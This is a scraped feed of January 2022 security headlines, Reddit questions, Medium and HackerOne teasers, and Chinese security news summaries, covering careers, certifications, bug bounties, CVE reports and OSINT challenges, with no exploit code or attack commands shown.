    Hi Everyone, I currently work in Cyber security (Cryptography specialist) for a large organization. However, I have minimal coding experience. I would like to start the Odin Project but I'm not sure if I should invest all that time in learning web dev or continuing a path in security with something like a CISSP for more security knowledge. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know it might halt my security knowledge progression and I know I can't balance learning both right now. Will having both skills be better than just having one? If anyone has another suggestion that would be better I am open to that as well. The odin project inspired me because I want to create custom blogs/websites of my own at some point but I do know I have a lot to learn in either path I choose. Thank you in advance. submitted by /u/Early_Ad_1861 [link] [comments]  ( 3 min )
    Backdoor payloads in image files: is this a thing?
    If I open an image in gmail (I think it opens through their viewer), can the payload run? Should I be concerned? Is just viewing it sufficient or would I have to download it? submitted by /u/anon314159265358p [link] [comments]  ( 1 min )
    Does anyone know what these photos/files are from the Brave browser folder?
    There were also some manifest.json's that had information like ""name":"Brave NTP sponsored images"", "Brave NTP sponsored images", "Tezos", "Taxbit" in them. Are these preloaded files for ads for a cryptocurrency/NFT manager that's placed somewhere in Brave intentionally? They were listed in a folder that looked like gibberish: "ghjifhoinncdowgrhioybqpasjndavbaoba" as an example. https://imgur.com/a/zozye1B I don't have to worry about some kind of "secret" cryptominer like Norton recently added to their software right? (I hope that this is the case and it's just files for ads). submitted by /u/nekohideyoshi [link] [comments]  ( 1 min )
    ISO 27001 Lead Auditor Certification
    Hey everyone. So I’m planning on doing the ISO 27001 LA certificate and came across it being offered by multiple certification body such as TUV, BSI and PECB. Can anyone tell me what the difference is between the certification bodies as I see a drastic price difference. Thanks in advance. submitted by /u/reeds1164 [link] [comments]  ( 1 min )
    What is the best entry level Linux certification?
    Hey everyone! Thank you for stopping by my post. I was wondering what is the best entry level Linux certification. I understand that the Linux + and Lpic-1 are no longer are a 1 for 2 package. Then everything I read online says don’t go for either of these and look into getting a red hat certification. I am going down the security engineer road and just need to get much deeper into Linux than I currently am. What are your recommendations and thoughts on Linux certifications? submitted by /u/RedNeckHutch [link] [comments]  ( 3 min )
    What can work computers/IT have access to?
    Assume you have a work laptop given to you with a remote software that’s installed to give IT monitoring and troubleshooting access. What are some best practices for separating your work and personal stuff when using the work laptop? Should you avoid logging into things like your personal google account, Bank accounts, etc? Does this make it possible for someone in IT possibly with bad intent to also have access to your other devices in your network? If so, best practices to avoid such breaches? I assume you never want to login into your other computers shared drives from your work computer which will give access to every file on your personal computer that’s shared. I’m curious what is the extent of monitoring that a normal corporate workplace does on the computer? I always assumed they can see my screen at any time, all key strokes are logged. But this makes me uncomfortable in the event that there’s a breach, hack, or bad employee who can cause lots of damage. Thoughts on this matter? Anyone familiar with kaseya software for monitoring? submitted by /u/RasAlTimmeh [link] [comments]  ( 1 min )
  • Open

    Beginner Bug Bounty Guide - Part 2
    Previous: Beginner Bug Bounty Guide - Part 1 Continue reading on Medium »  ( 1 min )
    Bug Fix Update: TribeOne dApp is Ready to Take NFT Space by Storm
    Our dApp is getting closer and closer to perfection as we work hard to achieve the best possible user experience. Continue reading on Medium »  ( 2 min )
    Kenobi Walkthrough | TryHackMe | Explained | Part 1
    Goals: Enumerate Samba for shares, manipulate a vulnerable version of proftpd Continue reading on Medium »  ( 3 min )
    Malicious file upload leads to off-domain XSS
    Hello Everyone, Continue reading on Medium »  ( 1 min )
    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the… Continue reading on InfoSec Write-ups »  ( 6 min )
  • Open

    GoWard - A robust Red Team proxy written in Go
    submitted by /u/UnwearableCactus [link] [comments]
    CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
    submitted by /u/Gallus [link] [comments]
  • Open

    Case in modern communist destabilization of Ukrainian-Poland relations
    Case provides overview of 5 year long activity of former Ukrainian citizen in Poland, conducting provocations and communist propaganda in… Continue reading on Medium »  ( 13 min )
    Quiztime — Random OSINT Challenge 5
    On Jan 14, 2022, Quiztime (contributor @dondude) shared a new OSINT quiz with us. The objective was fairly simple. We had to figure out… Continue reading on Medium »  ( 3 min )
    OSINT Challenge — On the road to Estonia
    In December 2021 the OSINT Dojo invited the community to solve a traditional image-based geolocation OSINT challenge. They have asked for… Continue reading on Medium »  ( 2 min )
  • Open

    SecWiki News 2022-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Buffer Overflow in optimized_escape_html method
    Internet Bug Bounty disclosed a bug submitted by chamal: https://hackerone.com/reports/1455248 - Bounty: $1200
    xss reflected on imgur.com
    Imgur disclosed a bug submitted by whoami991: https://hackerone.com/reports/1058427 - Bounty: $100
  • Open

    Android Pentesting-Intents
    When doing a black box pentesting for android , apart for looking at root detection bypass and ssl pinning looking for intents are also… Continue reading on Medium »  ( 2 min )
  • Open

    A collection of 8mm family videos from the 60's that have been digitized and restored
    submitted by /u/HGMIV926 [link] [comments]  ( 3 min )
  • Open

    OSS authors:“We need to understand your mitigation plans for this vulnerability”
    Article URL: https://twitter.com/bagder/status/1484672924036616195 Comments URL: https://news.ycombinator.com/item?id=30035651 Points: 68 # Comments: 11  ( 1 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    CVE-2021-45467: CWP CentOS Web Panel – Preauth RCE
    Article URL: https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/ Comments URL: https://news.ycombinator.com/item?id=30035247 Points: 1 # Comments: 0  ( 3 min )
    CVE-2022-0185: Detecting Linux Kernel vulnerability causing container escape
    Article URL: https://sysdig.com/blog/cve-2022-0185-container-escape/ Comments URL: https://news.ycombinator.com/item?id=30034914 Points: 18 # Comments: 0  ( 5 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Demystifying JA3: One Handshake at a Time
    Recently, I was browsing a website with BurpSuite and found out that the website was blocking my requests. In the pursuit of unlocking the…  ( 6 min )
  • Open

    Employee Access to Data
    This is largely for those who work in, have worked in, or have worked with a SOC. For this example, there is a SOC that has tiers of analysts, with lower level analysts performing basic tasks and escalating alerts to the upper level analysts. The lower level analysts serve more of a traffic cop type of role; they weed out the easily spotted false-positives and may start very basic reviews of true positive events before handing off to the higher level analysts for analysis. In this setup, all members of the SOC have full access to M365 (all mailboxes, all OneDrives). This is in addition to the ability to triage machines via an EDR tool and collect files through that tool. My question: is that type of access appropriate for the lower level analysts? The obvious concern is that it is excessive data for the role they are performing (including any especially since the position has fairly high turnover. What are your thoughts? submitted by /u/ebarboza311 [link] [comments]  ( 2 min )
    digital forensics software bypass encryption
    How does forenics software extract files from password protected iphones? submitted by /u/thecirclingfly [link] [comments]  ( 1 min )
    Old iphone se
    I have an old iphone se i rhink. Somebody tried logging in buch of times and locked out forever basically. So i connected to itunes and it told me to update it so i did just in case it gives me a chance to try again and now it says phone unavailable. And not lock screen. So am i screwed because its extremely important to get the videos and photos from there. submitted by /u/TushieandTush [link] [comments]  ( 1 min )

  • Open

    CVE-2022-0185: Detecting and mitigating Linux Kernel vulnerability causing container escape
    submitted by /u/MiguelHzBz [link] [comments]
    The best free, open-source supply-chain security tool? The lockfile
    submitted by /u/pabloest [link] [comments]  ( 1 min )
    Captain Hook - How (not) to look for vulnerabilities in Java applications
    submitted by /u/Gallus [link] [comments]
  • Open

    I need an advice
    Hi, I can choose among 3 internships as a computer science student. I really want to land a job in cybersecurity but right now I need to build up my CV and finish my degree. The 3 internships are: Automation Software Engineer (you have to validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, help evolving our telecommunication focused product, build demonstrations of product use cases help to prepare collaterals to explain technical product capabilities, software architectures and features, build automated test scripts to analyse test data to verify requirements compliance) Internship Program for Information Science or Telco Engineer (you have to participate to a project delivery for assigned tasks, that may include performing analysis and design of a IT or Telco Solution, SW Development, systems configurations, troubleshooting systems errors/problems, monitoring and/or testing systems performance, and contribute to the design of technical solutions for customer environments, work under supervision of technical lead and with customer nominated representatives to accomplish assigned tasks) Automated Assurance Artificial Intelligence & Machine Learning Engineer (validate portions of software implementations for Communication Service Providers based on established engineering principles and in accordance with provided specifications and requirements, develop and extend the coverage of current test automation, build automated test scripts to analyse test data to verify requirements compliance, work on small independent software and system integration projects to augment internal work). As you can see they are intertwined, but I would guess the 2nd one could be more cybersec-oriented (for the telco part). What do you think? Any advice is appreciated. submitted by /u/Danyderossi [link] [comments]  ( 2 min )
    Switching From IT Audit
    Hello, I work in IT audit and I would like to have a more operational/hands-on role within an IT department. The problem is that I don't have any experience dealing directly with IT work. How would you recommend I go about transitioning from IT audit to a more technical role? Any certifications or skillsets I you would recommend I obtain? I was thinking IT Security would probably be the best fit, given most of my audits are involved with IT security, patch management, or mobile device security. submitted by /u/DapperDandy22 [link] [comments]  ( 1 min )
    Payloads in Word/PDF documents: Is this still a thing?
    I read about this being used to hack computers recently. Are most computers still vulnerable to this? Payload=malicious file that could potentially create a backdoor that runs in the document when you enable macros (most people are not cognizant of this possibility). An article I read tested this successfully on a Windows machine running Outlook that defaulted to Adobe to read the PDF. I noticed in GMail that docs and PDFs aren't opened on the computer, but read in a window. Does this prevent payload execution? Anyways, I'd like to know if this is still a thing and why? Why can't Adobe or Microsoft build their applications to not allow this? submitted by /u/anon314159265358p [link] [comments]  ( 3 min )
    Red team Operator to security strategy consultant
    Hi all, I am currently working for a big four firm(US) as a red team member. I am thinking to switch to the broader sense of security to see more parts such as security stragegy/security officer/architect roles Many people see red teaming as the most fun job & I agree it is awesome. However, Red team is only smart part of the equation. Who has made the leap and switched to a strategy role as a pentester/red team? What was your experience in the new role? submitted by /u/TechnicalCiso [link] [comments]  ( 2 min )
    Taking on new role as Security Architect. Advice? Tips? Considerations? Anything welcome!
    As the title states, taking on a new role as a Security Architect for a predominantly Windows hybrid cloud/on-prem environment that hosts quite a few web servers. I am very comfortable with the deployment and configuration of hardened endpoints, SIEMs (Splunk & ELK), network segregation, backup and restoration, and authoring most relevant policy and procedure as it relates to NIST 800-53. My understanding is that I am one of 2 "cybersecurity" specialists and will be responsible for documenting, developing, and configuring the entire security architecture from the ground up. I've been told that MFA has been enforced at 100% compliance. I am not however familiar with securing a hybrid environment, and don't have a ton of experience managing firewalls. How should I approach the discovery/recon aspect of becoming familiar with a new network? After getting my bearings and a detailed depiction of the current architecture, I plan to first tackle the backup and restoration processes to ensure ransomware resistance. Then address any glaring weak points. Anything to help a brother out? submitted by /u/UnderZinfluence [link] [comments]  ( 4 min )
    likelyhood of embedding malicous code in music streaming services?
    to the Red Teamers: imagine this, i use a music streaming service, i have som playlists that me and my friends colloaborate on, this playlist have enabled "automatic download" so whenever a track is added it is also automaticly downloaded to my device. now take this further, you embed malicious code to tracks, and upload them to the music service, and then my friend add this track with malicious code to the playlist, and bam! i got the file on my systems. now add the fact that when you open af playlist to collaboration, it opens this playlist for everyone to add tracks. sure to hack the major providers of this service is going to be hard, but the small band/label/producer that uploads the tracks to the service, classic supply chain. and the bad actor can just browse around for open playlists and add these "bad" tracks and now you got the file to the device. so to what degree is this a like attack vector? is it at all feasable? because you got plenty versions for different OS with likely exploits available. i atleast was quite surprised to find a playlist of mine, with alot of new music i didnt recognize for a user i had not shared my playlist with. and was sitting at work and thought, "this is most likly an overlooked tool to use" so should one be worried about these "auto sync/download" a bit like dropbox, but here it is open to everyone/the world. atleast i block the unsanctioned cloud storage services, while permitting the web part at work, so when you download stuff via web its scanned and checked by our EDR, where i worry about the app's with auto sync and all that. so should i block spotify, tidal, soundcloud [insert service here] apps aswell? submitted by /u/Uli-Kunkel [link] [comments]  ( 3 min )
    Startup Asking for SSN in a Google Form
    I worked for a small startup during the summer of 2021. There were several things that came up during the internship that made me feel the company was not one that I would stand behind, and they didn't know what they were doing. They paid me hourly, but they never set up an employment contract that they promised. They never collected my tax info. Suddenly, within the last two days they have sent me several messages asking me to fill out a Google Form so they can complete the 1099's. The form is just straight up all the most sensitive information: full legal name, address, email & phone, SSN. (1) I'm not sure how secure it would be to send an SSN over a Google form, so I haven't done it yet. (2) I know that the form will result in a Google sheets that has all of the employees info, and I'm not sure if the company will keep that secure or delete it, but it weirds me out thinking that there might indefinitely be a Google form out there with my SNN other personal info, and they'll forget about it when the company inevitably goes defunct. (3) I'm not sure what other secure method I can suggest, to get them this information so they can send the 1099. submitted by /u/ImpressiveAirport4 [link] [comments]  ( 2 min )
    Anyone surprised about the lack of fundamental knowledge in network security? Not enough forward engineering knowledge it seems.
    There seems to be a surprising lack of fundamental knowledge in network security. Has anyone else felt the same? Here are some examples working with different teams: Work heavily with Kibana servers, but lacked fundamental database knowledge You would think someone managing a clusters would at least understand the basics of distributed systems Heavily use SIEMs, but could not tell you what a the concept of an operating system process beyond "Yeah, it's a program that executes." A serious lack of web development knowledge A lot of people entering the field claiming they are knowledgeable in network security, but can't forward engineer a basic CRUD app, and yet they'll claim they know how to reverse engineer it and secure it. Yeah, you're able to successfully complete a basic SQL injection hackthebox, but you could barely construct a SQL query yourself. You just blindly put in a SQL query and hope you get back an error saying the web application is vulnerable and then blindly put in another SQL query. submitted by /u/me_hungry_and_sad [link] [comments]  ( 4 min )
  • Open

    Cyber Investigator OSINT CTF “Cyber Crime” Writeup
    The Cyber Society at Cardiff University runs the Cyber Investigator CTF, a free CTF with OSINT and forensics challenges. Continue reading on Medium »  ( 4 min )
    First Blog…
    This is my first ever blog. Blogging is not something I ever thought i’d end up doing, but to obtain #OSINTDojo ranks & badges there are… Continue reading on Medium »  ( 6 min )
    Срочно! Поляки угрожают известному журналисту Игорю Исаеву!
    Известному запорожскому журналисту Игорю Исаеву в Польше грозят 3 годами тюрьмы. Кто это сделал? Continue reading on Medium »  ( 10 min )
    Windows Shell — Discovery Stage
    Sometimes you don’t always need a Meterpreter shell. Depending on the intent, Netcat might be all you need. The benefit being that Windows… Continue reading on Medium »  ( 5 min )
    Using Open Source Intelligence (OSINT)
    Recently, Netflix’s ‘The Great Hack’ has sparked a lot of interest around data privacy. The documentary covers Cambridge Analytica and how… Continue reading on Medium »  ( 7 min )
  • Open

    hosted.weblate.org display of unfiltered results
    Weblate disclosed a bug submitted by joshmcman08: https://hackerone.com/reports/1454552
    Email change or personal data change on the account.
    Stripe disclosed a bug submitted by dk82hg: https://hackerone.com/reports/1250037 - Bounty: $3000
    [https://app.recordedfuture.com] - Reflected XSS via username parameter
    Recorded Future disclosed a bug submitted by bombon: https://hackerone.com/reports/1201134 - Bounty: $300
    disclosing clients' secret keys https://stage-uapi.tochka.com:2000/
    QIWI disclosed a bug submitted by rivalsec: https://hackerone.com/reports/1419205 - Bounty: $150
  • Open

    Duplicating USB drives
    Good day all, I feel my question is on the border of Computer forensics, but I believe still pertinent. I do not come from a background in IT, and have been figuring this all out on my own in the past few years. I have acquired a set (x3) of USB drives to collect images and videos from clients phones in an easier way. I have added the exact nomenclature of what I have below. I need this to be done in a forensically sound manner, and I am currently going through the steps to validate my theory these collect data in a forensically sound manner. To be forensically sound any media should be "zeroed" or wiped prior to use. Herein lies my question. With these flash drives they obviously have some sort of proprietary software which makes them work. If I were to format these I would lose this proprietary software. What would be a way I could format these drives and then return them to "manufacturer settings"? ​ I have looked into USB duplicators, not sure if this could be a forensically sound option. Also, they seem too expensive to acquire for my organization currently. ​ USB in question: MFi Certified 128GB Photo-Stick for iPhone-USB-Flash-Drives External Storage Stick for USB C iPhone-Thumb-Drive Memory-Mobile-for-Android-Phones iPad-Flash-Drive Photo Transfer Stick submitted by /u/Unfair-Border8865 [link] [comments]  ( 3 min )
    Unexplained WAN traffic to private subnet ranges
    While investigating a remote intrusion warning I noticed http traffic from two separate devices communicating with private IP subnet ranges that do not belong to any of our routers, or other devices. All of the traffic are to port 80. Example IPs include: 10.50.60.15 10.80.80.112 209.54.181.102 All the above are reserved private ranges and the aforementioned traffic was observed on two different routers, but using the same Verizon modem. Anyone seen this before, or can explain? There are no VPNs in use, or similar service. Log submitted by /u/keeny-fn-pawers [link] [comments]  ( 1 min )
    SQLite query repository?
    Does anyone know of any repositories (sites, blogs, etc) where people can post and look for SQLite queries? There are times when the best tools in the world can’t parse what you want and I thought it would be a great resource if there were queries others had done and shared cataloged somewhere. If you know of any, or any good sites, drop them below! submitted by /u/acw750 [link] [comments]  ( 1 min )
    Forensic script ideas?
    Hello all, I have no programming experience, I can use command line and get around in Linux but I would like to make practical things the community would find useful. There are so many good scripts and tools out there but what is a missing tool that you would like to have? I would like to build the script/program in Python, Go or C#. I am looking for some ideas that you think a beginner would be able to tackle that would have some value to others. submitted by /u/AgitatedSecurity [link] [comments]  ( 2 min )
  • Open

    SecWiki News 2022-01-21 Review
    自动化渗透-DeepExploit框架深度分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
    SecWiki News 2022-01-21 Review
    自动化渗透-DeepExploit框架深度分析 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Simple CTF- TryHackme
    CTF Continue reading on System Weakness »  ( 2 min )
    Hashing the Favicon.ico
    Hey Folks, I am Ski Mask and I recently started bug bounty. in this Write-up, I will tell you about one of my findings!! Continue reading on Medium »  ( 1 min )
    Multi XSS Exploit in Upload File
    Hello amazing hunters, Today i want to notice 4 ways to find xss in file upload that i found all of them in bug bounty programs or pentest… Continue reading on System Weakness »  ( 2 min )
    Cronos Theft of Transactions Fees Bugfix Postmortem
    Transactions in blockchain are like sound traveling through air. We communicate with others through transactions; we announce what we’re… Continue reading on Immunefi »  ( 4 min )
    Nakji Network launches a 200K USD Bug Bounty Program
    Singapore, 21st January 2022 — The Nakji Foundation (‘Nakji’) is launching a 200K USD Bug Bounty program for developers and security… Continue reading on Sentinel Protocol »  ( 3 min )
    Top 10 web hacking techniques of 2021 — PortSwigger
    OK , mình sẽ từ từ dịch hết tất cả các method , các bạn có thể có thể xem bản gốc ở đây : “‘Top 10 web hacking techniques of 2021 —… Continue reading on Medium »  ( 1 min )
  • Open

    关于漏洞检测适用命令的思考
    通常会遇到需要发包,去观察返回结果。通过返回结果去判断命令是否执行。那么那种命令执行的效果最佳?  ( 1 min )
    FreeBuf早报 | 印尼央行遭勒索攻击13GB数据外泄;推特安全团队大动荡前高管离职
    推特安全部门的负责人皮特·扎特科已离开公司,他曾是安全领域的著名黑客“Mudge”。首席信息安全官林基·塞西将在未来几周内离职。  ( 1 min )
    Cisco StarOS漏洞或有远程代码执行和信息泄露风险
    日前,思科公司(Cisco)宣布修补了一项远程代码执行漏洞。
    FreeBuf 甲方私享会·上海金融之夜活动圆满举行
    1 月 15 日下午,由中国网络安全行业门户 FreeBuf 发起的首场「甲方私享会·上海金融之夜」活动在上海顺利举行。
    FreeBuf周报 | 知名字幕站 Opensubtitles 遭黑客入侵;中国首个网络安全行业服务短号开通
    我们总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!  ( 1 min )
    ASRC 2021年电子邮件安全趋势回顾
    后疫情时代,大家也都慢慢开始适应远程办公,信息安全设备的部署不再只是慌乱应对远程工作所带来的安全隐患,而是全新型态的适应性部署  ( 1 min )
    2021年针对性勒索攻击活动年度报告
    索软件攻击已经是网络安全的最大威胁之一,已从早期网络滋扰发展成为如今危害社会运作、经济稳定和公共安全并不断升级的全球新挑战。  ( 1 min )
    盖棺事已:REvil勒索组织落网
    14日俄罗斯当局公布对勒索组织REvil实施抓捕  ( 1 min )
    2021网安法规大盘点:重磅法规持续落地,数据安全迎新机遇
    总的来说,2021年是数字经济腾飞之年,也是网络安全全面深入发展之年,更是数据领域全面深入监管之年。  ( 1 min )
    Freebuf甲方群话题讨论 | 聊聊企业假期网络安全
    春节将至,对于企业安全而言是一次不小的考验,作为年前最后一期话题讨论,想让大家聊聊如何保障假日期间企业的网络安全。  ( 1 min )
    2021 SCTF Flying-kernel题目分析
    这道题可以通过多种方式提权获得flag。这篇文章的解法更偏向于Glibc那套利用方式,内核任意地址写,并不是预期解,但是衍生出了更多的利用思路,有兴趣的可以自行调试。  ( 3 min )
    FreeBuf 网安大事记 | 2021年度漏洞利用事件汇总
    让我们回眸,盘点在2021年引发行业、乃至整个社会影响的30起漏洞利用事件。  ( 1 min )
    《信息安全技术 网络安全服务成本度量指南》(征求意见稿)发布
    《指南》适用于网络安全服务供需双方开展网络安全服务成本预算、项目招投标、项目决算以及相关合同编制等活动。
  • Open

    Lessons from the Log4j crisis: Are we ready for the next global vulnerability?
    Were you prepared for Log4Shell? These lessons learned will help your organization respond more efficiently to the next global vulnerability crisis. READ MORE  ( 3 min )
    What to know about Biden’s latest cybersecurity memorandum
    The Biden Administration’s new memorandum on National Security aims to improve security posture for intelligence and defense agencies. Here’s what you need to know. READ MORE  ( 2 min )
  • Open

    RedRabbit — Offensive PowerShell
    RedRabbit is the twin of BlueRabbit however, RedRabbit has more offensive scripts. RedRabbit was created to help conduct ethical… Continue reading on Medium »  ( 3 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    A modern, elastic design for Burp Collaborator server
    When we launched Burp Collaborator back in 2015, PortSwigger deployed a public Collaborator server that anyone could use. This meant that OAST testing with Burp Collaborator was able to work straight  ( 4 min )
  • Open

    Security vulnerability in Rust standard library
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30023615 Points: 64 # Comments: 37  ( 2 min )
    DNS Vulnerability, Configuration Errors That Can Cause DDoS
    Article URL: https://labs.ripe.net/author/giovane_moura/dns-vulnerability-configuration-errors-that-can-cause-ddos/ Comments URL: https://news.ycombinator.com/item?id=30021239 Points: 1 # Comments: 0  ( 7 min )
  • Open

    Tons of software to Try and Buy :-)
    https://soft.uclv.edu.cu/ submitted by /u/Appropriate-You-6065 [link] [comments]  ( 1 min )
  • Open

    Authz0 v1.1 Released 🎉
    Hi security engineers and hackers! Authz0 v1.1.0 has been released 🎉 First of all, I would like to thank many of you for your good feedback. Summary Add setCred command Add –include-zap flag in new command Add –include-har flag in new command Add –include-burp flag in new command Add –assert-fail-size-margin flag in new command Support multiple same assert type Improve report Fixed bugs Credentials and setCred Now, we can add credentials to the template using the setCred command.

  • Open

    Invalid handling of X509_verify_cert() internal errors in libssl (CVE-2021-4044)
    Internet Bug Bounty disclosed a bug submitted by tniessen: https://hackerone.com/reports/1455411 - Bounty: $1200
    Reflected XSS online-store-git.shopifycloud.com
    Shopify disclosed a bug submitted by bepresent: https://hackerone.com/reports/1410459 - Bounty: $3500
    Direct Access To admin Dashboard
    Shopify disclosed a bug submitted by mester_x: https://hackerone.com/reports/1421804 - Bounty: $500
    Stored XSS at https://linkpop.com
    Shopify disclosed a bug submitted by nagli: https://hackerone.com/reports/1441988 - Bounty: $1600
    Cross-site Scripting (XSS) - Stored on ads.tiktok.com in Text field
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1376961 - Bounty: $999
  • Open

    Does anyone know what "gaia_account_name" means specifically in the context of a Google Duo database table?
    I couldn't find much at all, but I feel like "gaia" has some connotation like mother/creator/origin, and thus "gaia_account_name" means the account name of the user that setup Google Duo on the device. Any progress toward certainty is greatly appreciated. submitted by /u/PieWithIceCreamCrust [link] [comments]  ( 1 min )
    I hosted a webinar for HTCIA last week about providing effective expert witness testimony - here’s the recording!
    submitted by /u/Monolith_Pro [link] [comments]  ( 1 min )
    Effective imaging/cloning large disk
    Hi there. Is there a most effective way of imaging very large disks (over 2 terra bytes)? The next challenge is when doing the automated analysis (I'm using Autopsy), is there a more effective (fastest) way to do this? I once analyzed a 1 TB disk using Autopsy and it took more than 1 week to complete (the computer specification: CPU i7 6th Gen, RAM 32GB, imaging results on SSD, and using type C connector) EDIT 1: Thank you for all of your feedback. I can't afford a TX1 or any licensed tool (hardware or software based) at the moment. Using the open source tool is preferred. However, I also open for any licensed hardware or software suggestions. The only licensed hardware that I use is the WiebeTech write blocker. I'm using Autopsy for automated analysis (some ingest modules were used such as hashing, web artifacts, keyword search, and Plaso) and CAINE for manual analysis. submitted by /u/modpr0be [link] [comments]  ( 3 min )
  • Open

    Log4j RCE When Remote Class File Won’t Load (Newer Java Versions)
    So you might have heard of the log4j vulnerability (lol). If you’ve read the initial proof of concepts/general information that rushed out… Continue reading on Medium »
    Coletando parâmetros com o BURP SUITE!
    A fase de reconhecimento é a mais importante enquanto estamos analisando um “alvo”, e a coleta de parâmetros pode mudar o rumo do seu… Continue reading on Medium »  ( 2 min )
    Early bed bug stains on sheets
    Bedbugs are a real threat to your sleep quality. These small, oval, and brown animals at night eat our blood at night. If you wake up with… Continue reading on Medium »  ( 3 min )
    My First Blind XSS
    Disclaimer Continue reading on Medium »  ( 2 min )
    Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s…
    Title Facebook room deep linking vulnerability, allow malicious user to know the code for anyone’s meeting. Continue reading on Medium »  ( 2 min )
    Bug Bounty Methodology — Bug Hunting Checklist(PART-2)
    Hello people, it’s me again. I apologize for being late about the second part. I had some examinations going on and have been busy for the… Continue reading on Medium »  ( 2 min )
    XYZ of XSS
    Hello Ninjas! Today I am going to share everything(Almost Everything :P) that I know about Cross-site Scripting vulnerabilities. I would… Continue reading on Medium »  ( 4 min )
    PORTSWIGGER WEB SECURITY - AUTHENTICATION LAB ÇÖZÜMLERİ
    Web uygulamalarının en önemli parçalarından biri olan Authentication, belirli bir kullanıcı veya istemcinin kimliğini doğrulama işlemidir… Continue reading on Medium »  ( 17 min )
    How I Hacked into Pune University’s Exam/Teachers Portal
    Bypassing the Authentication mechanism results in an amazing Account takeover. Continue reading on Medium »  ( 4 min )
    Nakji Network’s 200K Bug Bounty Program
    The Nakji Foundation Continue reading on Medium »  ( 2 min )
  • Open

    Big Tech advertiser friendliness and SEO garbage.
    This is potentially a bit off-topic for this sub, but hopefully well within scope for the users: Feels like search results are full of complete nonsense (I've moved from google to qwant about a year ago, which was good at first, but now seems to be getting worse) and individual mainstream websites are constantly banning creators and removing content that's otherwise useful but potentially unfriendly to advertisers. This is just a loose feeling that the internet is getting worse every day, I'm wondering if there is any pushback against this and if it's possible to get an experience closer to 10-15 years ago when it didn't feel like a dystopian hellscape was rapidly approaching. Are corporate friendly walled gardens going to be the future of the internet? Is this going to be preferred when search engines lose the arms race against SEO spam? Is the sky actually falling? submitted by /u/TwinkyTheBear [link] [comments]  ( 1 min )
    Any love for Carbon Black EDR?
    CB Advanced is $30/device. SentinelOne Control is $31/device. CB gives me a process tree/timeline of the attack. S1 requires Complete to do that, about $60/device. I've been quoted $2,500 for VMware to help setup my policies so it's set and forget. I read a lot of hate on here about CB being too noisy. Also a decent amount of hate for S1. CrowdStrike seems to be the favorite but it's $70-80/device, so wanting CB or S1. Which one would you go with? 200 devices, so small environment. Upgrading from Webroot, so anything is better. submitted by /u/JeepMunkee [link] [comments]  ( 2 min )
    Which cloud IaS service for DDoS tests?
    Hello, we are a small pentesting firm and want to include (small-scale, short-term!) "DDoS" tests in our portfolio (only whitehat tests with full permission, simple stuff such as SYN floods, TLS flooding, slow loris). Our last cloud VPS vendor was ok with it first, but withdrew their permission to use their boxes for any kind of DDoS testing after a number of successful tests. Maybe it was just a nervous employee - but it is a problem for us if we cannot fulfill our obligations to our customers if the cloud vendor suddenly cuts our service. => We are thus looking for a reliable and trustworthy cloud IaS (VPS) provider for small scale DDoS tests: Up to a 100 virtual servers at a time (starting with 1, then adding servers until saturation is given or the target system passes the test without service reduction) API for instantiating/provisioning and starting/stopping the boxes, executing scripts Reasonable network connection - but volumetric DDoS testing is only the smallest part of our test suite Central to Eastern European area preferred Only whitehat tests with full permission, reputable business Only short bursts in the magnitude of minutes (until our monitor sensor recognizes service degradation in the target) Can you recommend cloud VPS vendors which are OK with such small-scale, short-term DDoS tests? Thank you very much! Dany submitted by /u/thrownetsecddos [link] [comments]  ( 1 min )
    What is this presumed phishing email trying to accomplish?
    The only thing I can think of is they are trying to get me to call the 888-number in the message. Simple Order is restaurant software, I don't work in a restaurant and they wouldn't have iPads. The address at the bottom in California is a house. There is no Durham in NY that I can find (the ship to). Paypal is clean. What am I missing? There are no links, no pictures or attachments I can find. I sanitized my name (which was correct) and my email address, everything else is from the original raw email. Please let me know if you need anything else to help figure out what's happening here. Thanks! ​ Received: from 10.217.151.75 by atlas212.free.mail.ne1.yahoo.com with HTTPS; Thu, 20 Jan 2022 15:49:18 +0000 Return-Path: X-Originating-Ip: [209.85.166.178] Rec…  ( 5 min )
    Help with Masters Thesis :) Python RAT Malware Samples
    Hey everyone, I am currently in the process of completing my dissertation which involves creating my own python malware to test some free anti-virus solutions and software. For the dissertation/thesis i need to find some samples of RAT malware written in python to analyse , I have managed to find a couple but ideally I need a good website/resource that has a database off them. Any help would be great , many thanks! submitted by /u/DJ0x [link] [comments]  ( 2 min )
    Home network abused for brute force ssh attacks
